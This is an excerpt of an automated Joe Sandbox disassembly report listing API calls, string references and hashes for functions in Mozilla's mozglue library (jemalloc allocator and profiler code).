                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C621695
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6216B4
                                                                  • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C621770
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C621A3E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset$freemallocmemcpy
                                                                  • String ID: ~q_l$~q_l
                                                                  • API String ID: 3693777188-2274163580
                                                                  • Opcode ID: 1b3168a3dfb5a0805d51b8896217f33ed8638c762e42a502925bed82ebf07194
                                                                  • Instruction ID: 75351e9967dd3d8bea4a5cbbb46ad0b543c686f7da169684c73e6339c1ee3688
                                                                  • Opcode Fuzzy Hash: 1b3168a3dfb5a0805d51b8896217f33ed8638c762e42a502925bed82ebf07194
                                                                  • Instruction Fuzzy Hash: D3B31871E04219CFCB24CFA8C890ADDB7B2BF49304F2582A9D449AB745D735AD86CF94
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67E7B8), ref: 6C60FF81
                                                                  • LeaveCriticalSection.KERNEL32(6C67E7B8), ref: 6C61022D
                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C610240
                                                                  • EnterCriticalSection.KERNEL32(6C67E768), ref: 6C61025B
                                                                  • LeaveCriticalSection.KERNEL32(6C67E768), ref: 6C61027B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 618468079-3577267516
                                                                  • Opcode ID: d4154d63c9c7c7b6a15692cabdade44980e18164e0d4d5db6fd7822397a0396b
                                                                  • Instruction ID: ea323ee8236df2fd92b6e14a865506a7a68230a9a39530bdc247cae73f4d555b
                                                                  • Opcode Fuzzy Hash: d4154d63c9c7c7b6a15692cabdade44980e18164e0d4d5db6fd7822397a0396b
                                                                  • Instruction Fuzzy Hash: E3C2E171A097418FDB14CF2DC580756BBE1BF85329F28CA6DE4698BB95C731E801CB89
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,00004014), ref: 6C65E811
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C65EAA8
                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C65EBD5
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C65EEF6
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C65F223
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C65F322
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C660E03
                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C660E54
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C660EAE
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C660ED4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset$memcpy
                                                                  • String ID:
                                                                  • API String ID: 368790112-0
                                                                  • Opcode ID: 22193c7bf6e65f47521a7546cbfd2b41534f1c3c426c4e39e0d0d991257189db
                                                                  • Instruction ID: a31dd06adc9b702a02bb8e2572f8e59d8429ecd96f9f434b4dda432a258bda88
                                                                  • Opcode Fuzzy Hash: 22193c7bf6e65f47521a7546cbfd2b41534f1c3c426c4e39e0d0d991257189db
                                                                  • Instruction Fuzzy Hash: EB63AD71E0025ACFCB04CFA9C8906DDFBB2FF89314F298229D855AB745D730A946CB95
                                                                  APIs
                                                                    • Part of subcall function 6C657770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>cl,?,?,?,6C633E7D,?,?), ref: 6C65777C
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C633F17
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C633F5C
                                                                  • VerSetConditionMask.NTDLL ref: 6C633F8D
                                                                  • VerSetConditionMask.NTDLL ref: 6C633F99
                                                                  • VerSetConditionMask.NTDLL ref: 6C633FA0
                                                                  • VerSetConditionMask.NTDLL ref: 6C633FA7
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C633FB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                                                  • String ID: C>cl$nvd3d9wrap.dll$nvinit.dll
                                                                  • API String ID: 1189858803-369860140
                                                                  • Opcode ID: 232f1babb309a049ad98be6d2209b629328481822a0ad36c1227a257630d5375
                                                                  • Instruction ID: 574b3716a0422b7612d7549a2b8105cd50241476d29c98c0a03fdc2339f1300a
                                                                  • Opcode Fuzzy Hash: 232f1babb309a049ad98be6d2209b629328481822a0ad36c1227a257630d5375
                                                                  • Instruction Fuzzy Hash: 69520631614B444FDB19DF35C980ABBB7E9AF81308F14482DD5968B782CB74F909CB68
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67E7B8), ref: 6C60FF81
                                                                  • LeaveCriticalSection.KERNEL32(6C67E7B8), ref: 6C61022D
                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C610240
                                                                  • EnterCriticalSection.KERNEL32(6C67E768), ref: 6C61025B
                                                                  • LeaveCriticalSection.KERNEL32(6C67E768), ref: 6C61027B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 618468079-3566792288
                                                                  • Opcode ID: 4d29b1e154bddc2818cff3ad6370a802c538136e2c816f565c7df0c224911fd8
                                                                  • Instruction ID: 98f3742efe59498302514fc9115d23a827b1977b704ecb00c76476955657479d
                                                                  • Opcode Fuzzy Hash: 4d29b1e154bddc2818cff3ad6370a802c538136e2c816f565c7df0c224911fd8
                                                                  • Instruction Fuzzy Hash: 0FB2DF71A097418FDB18CF2DC590756BBE1BF85329F28C66CE86A8BB95C730D840CB49
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                                                  • API String ID: 0-2712937348
                                                                  • Opcode ID: 3d1a8dcc057f76f54154867015abd025f1343b9fd2668b6ee31e85a26b8bd3e3
                                                                  • Instruction ID: c4f5b736671e16504ff2e2bee2e50b355c3b855a2393bd10c6815b562569f0a5
                                                                  • Opcode Fuzzy Hash: 3d1a8dcc057f76f54154867015abd025f1343b9fd2668b6ee31e85a26b8bd3e3
                                                                  • Instruction Fuzzy Hash: 59923C71A083418FD724CF29C490B9ABBE1BFC9308F14C91DE59A9B751DB31E849CB96
                                                                  APIs
                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C642ED3
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C642EE7
                                                                  • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C642F0D
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C643214
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C643242
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6436BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: strlen$AddressCode$DescribeDetailsFormat
                                                                  • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                                                  • API String ID: 2257098003-3318126862
                                                                  • Opcode ID: 8f722619ab7271e4526f7f779c3f5e81d8887b2c8a138ec69ffd251075ddd3ad
                                                                  • Instruction ID: 153a85726fc7378a0a03c8b11008009d5362e6eb2f5fea8bf72bb93da298ed05
                                                                  • Opcode Fuzzy Hash: 8f722619ab7271e4526f7f779c3f5e81d8887b2c8a138ec69ffd251075ddd3ad
                                                                  • Instruction Fuzzy Hash: 5A325D706083818FD724CF24C4906AFBBE2AFCA318F54CD2DE59987751DB31994ACB5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpystrlen
                                                                  • String ID: (pre-xul)$data$name$schema$vgl
                                                                  • API String ID: 3412268980-3118193200
                                                                  • Opcode ID: 8ba245cea1923ba422a61649ee8527e7bfdd0b5f7a5fd938c013ee1e84b136a8
                                                                  • Instruction ID: 9d5d5719b19ace90b9baa9988b55942f583489c675912c8a747ea33ee751844c
                                                                  • Opcode Fuzzy Hash: 8ba245cea1923ba422a61649ee8527e7bfdd0b5f7a5fd938c013ee1e84b136a8
                                                                  • Instruction Fuzzy Hash: 31E16EB1B043508BC714CF69884065BFBEABFC5314F14892DE899E7790DBB0DD498B9A
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 6C656009
                                                                  • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C656024
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Q_l,?), ref: 6C656046
                                                                  • OutputDebugStringA.KERNEL32(?,Q_l,?), ref: 6C656061
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C656069
                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C656073
                                                                  • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C656082
                                                                  • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C67148E), ref: 6C656091
                                                                  • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Q_l,00000000,?), ref: 6C6560BA
                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C6560C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                  • String ID: Q_l
                                                                  • API String ID: 3835517998-757364120
                                                                  • Opcode ID: cd83abbf4ec0b2c89e0950d6895fef7365f10fa9f95db4a0fec31125532f577d
                                                                  • Instruction ID: 0dbfa66d316b73d8ffd2b603db7484e1e19f27841cb2742a954508b80e96fd45
                                                                  • Opcode Fuzzy Hash: cd83abbf4ec0b2c89e0950d6895fef7365f10fa9f95db4a0fec31125532f577d
                                                                  • Instruction Fuzzy Hash: 5F210570A002189FDB105F25DC4DAAE7BB8FF85718F108828E81AD7340CB34A959CFE9
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(-0000000C), ref: 6C615EDB
                                                                  • memset.VCRUNTIME140(ewel,000000E5,?), ref: 6C615F27
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C615FB2
                                                                  • memset.VCRUNTIME140(ewel,000000E5,?), ref: 6C6161F0
                                                                  • VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6C617652
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)$ewel
                                                                  • API String ID: 2613674957-3199334182
                                                                  • Opcode ID: dabfec87ba2c0bdf99521cda5077dbdfc047a2650f0c2dfe393e52ef22e7958b
                                                                  • Instruction ID: d873d38de881a35cba0c7ac0bba5f8815ad3e82048a20bb418226241c6e59221
                                                                  • Opcode Fuzzy Hash: dabfec87ba2c0bdf99521cda5077dbdfc047a2650f0c2dfe393e52ef22e7958b
                                                                  • Instruction Fuzzy Hash: 9E338C716097018FC308CF2DC590615BBE2FF85329F29C6ADE9698BBA5D731E841CB49
                                                                  Strings
                                                                  • schema, xrefs: 6C6448C1
                                                                  • data, xrefs: 6C6449B4
                                                                  • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration, xrefs: 6C644D0A
                                                                  • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*2, xrefs: 6C644D65
                                                                  • -%llu, xrefs: 6C644825
                                                                  • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*3, xrefs: 6C644DB8, 6C644DD8
                                                                  • ProfileBuffer parse error: %s, xrefs: 6C644DD9
                                                                  • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime, xrefs: 6C644CAF
                                                                  • gl, xrefs: 6C644F88
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID: gl$-%llu$ProfileBuffer parse error: %s$data$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*2$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*3$schema
                                                                  • API String ID: 1294909896-1877600697
                                                                  • Opcode ID: d16035057b397de6e403e5c36f180a7cbf305d7e56c343ba8e82fbe6ed599610
                                                                  • Instruction ID: f9364334e7e4277b22eb56b5fbb684030e89b7b14886a246c3d1d44452a3047d
                                                                  • Opcode Fuzzy Hash: d16035057b397de6e403e5c36f180a7cbf305d7e56c343ba8e82fbe6ed599610
                                                                  • Instruction Fuzzy Hash: 92721B71918B858BD362CF34C4513ABF7E5AFDA344F10CB1DE48A6B610EB70A486DB46
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C62D1C5), ref: 6C61D4F2
                                                                  • LeaveCriticalSection.KERNEL32(6C67E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C62D1C5), ref: 6C61D50B
                                                                    • Part of subcall function 6C5FCFE0: EnterCriticalSection.KERNEL32(6C67E784), ref: 6C5FCFF6
                                                                    • Part of subcall function 6C5FCFE0: LeaveCriticalSection.KERNEL32(6C67E784), ref: 6C5FD026
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C62D1C5), ref: 6C61D52E
                                                                  • EnterCriticalSection.KERNEL32(6C67E7DC), ref: 6C61D690
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C61D6A6
                                                                  • LeaveCriticalSection.KERNEL32(6C67E7DC), ref: 6C61D712
                                                                  • LeaveCriticalSection.KERNEL32(6C67E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C62D1C5), ref: 6C61D751
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C61D7EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                  • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                  • API String ID: 2690322072-3894294050
                                                                  • Opcode ID: bf6e5e232ca202e544e4fc4cff9828bffab9c94ee90585403f16e694e4c0920e
                                                                  • Instruction ID: be4dd4740b90a97457fe28c7205c56831057b5889f574d2716ebc351663f5cb5
                                                                  • Opcode Fuzzy Hash: bf6e5e232ca202e544e4fc4cff9828bffab9c94ee90585403f16e694e4c0920e
                                                                  • Instruction Fuzzy Hash: 2991F371A087118FD71ACF2DC49076AB7E1EB89319F14892EE45AC7F80D734E845CB9A
                                                                  APIs
                                                                  • Sleep.KERNEL32(000007D0), ref: 6C654EFF
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C654F2E
                                                                  • moz_xmalloc.MOZGLUE ref: 6C654F52
                                                                  • memset.VCRUNTIME140(00000000,00000000), ref: 6C654F62
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6552B2
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6552E6
                                                                  • Sleep.KERNEL32(00000010), ref: 6C655481
                                                                  • free.MOZGLUE(?), ref: 6C655498
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                  • String ID: (
                                                                  • API String ID: 4104871533-3887548279
                                                                  • Opcode ID: 029c3fea6ef1d458663b5b98550b62e76978de50eb5513f72802d42340b4d222
                                                                  • Instruction ID: 37fac6fe6ec29b5788413457d72f15c0df9a883d5aa7b6b2029c1e2208d4d449
                                                                  • Opcode Fuzzy Hash: 029c3fea6ef1d458663b5b98550b62e76978de50eb5513f72802d42340b4d222
                                                                  • Instruction Fuzzy Hash: 1BF1E471A18B108FC717CF3AC89062BB7F5AFD6384F058B2EF846A7650DB3194428B45
                                                                  APIs
                                                                  • GetLastError.KERNEL32 ref: 6C657046
                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C657060
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C65707E
                                                                    • Part of subcall function 6C6081B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a Time entry), ref: 6C6081DE
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C657096
                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C65709C
                                                                  • LocalFree.KERNEL32(?), ref: 6C6570AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                  • String ID: ### ERROR: %s: %s$(null)
                                                                  • API String ID: 2989430195-1695379354
                                                                  • Opcode ID: 0f47b4ad35c498fcdf2de1ee3248b38c4f8ee584d31f1739690621f1ba7cc03e
                                                                  • Instruction ID: 04c24cfe2b536172f2a6581dc3b58e4f1bb9835d1f3c74a6efe38451ddefc69b
                                                                  • Opcode Fuzzy Hash: 0f47b4ad35c498fcdf2de1ee3248b38c4f8ee584d31f1739690621f1ba7cc03e
                                                                  • Instruction Fuzzy Hash: 5701B9B1A00114AFDB05AB65DC4EDAF7BBCEF89254F010825FA05A3241D67169188FB9
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C619EB8
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C619F24
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C619F34
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C61A823
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C61A83C
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C61A849
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
